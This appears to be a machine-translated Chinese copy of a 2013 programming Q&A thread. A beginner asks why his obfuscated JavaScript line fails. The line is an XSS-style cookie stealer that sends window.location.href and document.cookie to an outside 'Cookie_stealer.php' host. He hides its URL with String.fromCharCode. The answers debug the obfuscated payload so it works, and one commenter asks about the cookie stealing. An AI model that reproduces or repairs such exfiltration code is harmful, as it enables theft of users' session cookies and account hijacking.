Javascript string.fromcharcode

我是JavaScript和編程的新手。Javascript string.fromcharcode

這是原單碼：

document.location = "http://ormteam.net23.net/Cookie_stealer.php?url=" + window.location.href + "&cookies=" + document.cookie;

這是使用String.fromCharCode

document.location = String.fromCharCode(34, 104, 116, 116, 112, 58, 47, 47, 111, 114, 109, 116, 101, 97, 109, 46, 110, 101, 116, 50, 51, 46, 110, 101, 116, 47, 67, 111, 111, 107, 105, 101, 95, 115, 116, 101, 97, 108, 101, 114, 46, 112, 104, 112, 63, 117, 114, 108, 61, 34) + document.url + String.fromCharCode(34, 38, 99, 111, 111, 107, 105, 101, 115, 61, 34) + document.cookies;

爲什麼這不起作用？

坐在這個和平的代碼幾個小時！ ; //

來源

2013-07-06 Karlis Cudars

只有字符串文字需要引號。既然你沒有使用字符串，你不需要引號。

document.location = String.fromCharCode(104, 116, 116, 112, ...

來源

2013-07-06 22:48:30

可以去這樣的一個鏈接，從而導致竊取我的cookie並導致任何安全問題？ :) – sabithpocker

@sabithpocker沒有比直接使用字符串直接鏈接可以。 – pickypg

@pickypg只是好奇，因爲它通過'document.cookie'作爲'GET'參數，當我在控制檯中嘗試它時。 – sabithpocker

刪除34從，因爲它們是"

那些字符代碼使document.cookies到document.cookie

如果你是新的JavaScript，只是好奇與餅乾竊取你在做什麼！

來源

2013-07-06 22:54:47 sabithpocker

Javascript string.fromcharcode

回答

相關問題